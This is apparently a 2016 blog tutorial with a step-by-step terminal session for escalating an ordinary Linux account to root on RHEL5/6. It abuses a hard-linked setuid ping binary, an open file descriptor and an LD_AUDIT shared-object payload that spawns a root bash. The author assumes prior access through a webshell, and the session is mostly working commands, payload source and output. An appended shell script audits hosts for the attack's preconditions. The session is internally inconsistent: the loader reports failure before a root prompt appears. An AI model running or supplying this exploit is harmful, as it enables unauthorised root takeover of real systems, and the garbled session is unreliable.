016 Privilege escalation using a Linux vulnerability


Author: 星期四晚八点 | Published: 2016-09-15 12:24

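    Video material link

    Privilege escalation using a Linux vulnerability

    Privilege escalation: ordinary account -> root
    Applies to both RHEL5 and RHEL6
    Precondition: access as an ordinary account, for example through a webshell or planted code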

    [root@PC1 ~]# useradd mk  
    [root@PC1 ~]# su mk  
    [mk@PC1 /]$ ll -d /tmp/  
    drwxrwxrwt. 3 root root 4096 7月  11 03:54 /tmp/  
    [mk@PC1 /]$ cd /tmp/
    
    [mk@PC1 tmp]$ mkdir exploit  
    [mk@PC1 tmp]$ ll -d /bin/ping  
    -rwsr-xr-x. 2 root root 40760 9月  26 2013 /bin/ping  
    [mk@PC1 tmp]$ ln /bin/ping /tmp/exploit/target  
    [mk@PC1 tmp]$ ll !$  
    ll /tmp/exploit/target  
    -rwsr-xr-x. 3 root root 40760 9月  26 2013 /tmp/exploit/target
    
    [mk@PC1 tmp]$ exec 3< /tmp/exploit/target  
    [mk@PC1 tmp]$ ll /proc/$$/fd/3  
    lr-x------. 1 mk mk 64 7月  11 06:04 /proc/25208/fd/3 -> /tmp/exploit/target  
    [mk@PC1 tmp]$ ll /tmp/exploit  
    总用量 40  
    -rwsr-xr-x. 3 root root 40760 9月  26 2013 target  
    [mk@PC1 tmp]$ rm -rf /tmp/exploit/  
    [mk@PC1 tmp]$ ll /proc/$$/fd/3  
    lr-x------. 1 mk mk 64 7月  11 06:04 /proc/25208/fd/3 -> /tmp/exploit/target (deleted)  
    [mk@PC1 tmp]$ vim payload.c
    
    void __attribute__((constructor)) init()   // __ is two underscores
    {
            setuid(0);
            system("/bin/bash");
    }
    
    [mk@PC1 tmp]$ yum -y install gcc
    Loaded plugins: fastestmirror, security
    You need to be root to perform this command.
    [mk@PC1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
    [mk@PC1 tmp]$ ll /tmp/exploit
    -rwxrwxr-x. 1 mk mk 6020 7月  11 07:29 /tmp/exploit
    [mk@PC1 tmp]$ LD_AUDIT="\$0RIGIN" exec /proc/self/fd/3
    ERROR: ld.so: object '$0RIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
    Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
                [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
                [-M mtu discovery hint] [-S sndbuf]
                [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
    [root@PC1 ~]# 
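
Added example, not part of the original post: a defender-side audit of the conditions each step of the session relies on (a setuid file with an extra hard link in a writable directory, a shared filesystem, the kernel hard-link restriction, and a descriptor left open on a deleted setuid file). The function names are hypothetical, and the `fs.protected_hardlinks` sysctl is an assumption about the audited host, since it exists only on Linux 3.6 and later.

```sh
#!/bin/sh
# Added defensive audit, not from the original post; function names are
# hypothetical. Each check maps to one step of the session above.

# Setuid regular files under DIR that have more than one hard link, which is
# what `ln /bin/ping /tmp/exploit/target` creates in a user-writable directory.
find_multilinked_suid() {
    find "$1" -xdev -type f -perm -4000 -links +1 -print 2>/dev/null
}

# Hard links cannot cross filesystems: the `ln` step needs the writable
# directory and the setuid binary on the same device.
same_filesystem() {
    a=$(stat -c %d "$1" 2>/dev/null) && b=$(stat -c %d "$2" 2>/dev/null) &&
        [ "$a" = "$b" ]
}

# Kernel hard-link restriction (sysctl fs.protected_hardlinks, mainline since
# Linux 3.6). KNOB is a parameter only so the function can be tested.
hardlink_protection() {
    knob=${1:-/proc/sys/fs/protected_hardlinks}
    [ -r "$knob" ] || { echo unavailable; return 0; }
    if [ "$(cat "$knob")" = 1 ]; then echo enabled; else echo disabled; fi
}

# Descriptors still open on an unlinked setuid file: the "(deleted)" state
# shown after `rm -rf /tmp/exploit/`. PROC defaults to /proc; run as root to
# see other users' processes.
deleted_suid_fds() {
    for fd in "${1:-/proc}"/[0-9]*/fd/*; do
        t=$(readlink "$fd" 2>/dev/null) || continue
        case $t in *" (deleted)") [ -u "$fd" ] && echo "$fd -> $t" ;; esac
    done
    return 0
}

report() {
    echo "protected_hardlinks: $(hardlink_protection)"
    same_filesystem /tmp /bin/ping && echo "/tmp shares a filesystem with /bin/ping"
    echo "multi-linked setuid files in /tmp:"; find_multilinked_suid /tmp
    echo "open descriptors on deleted setuid files:"; deleted_suid_fds
    return 0
}

if [ "${1:-}" = "--report" ]; then report; fi
```

Run it with `--report` on the host being audited. The hard link exists only until the `rm -rf` step, so the open-descriptor check is the one that still fires afterwards.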
    
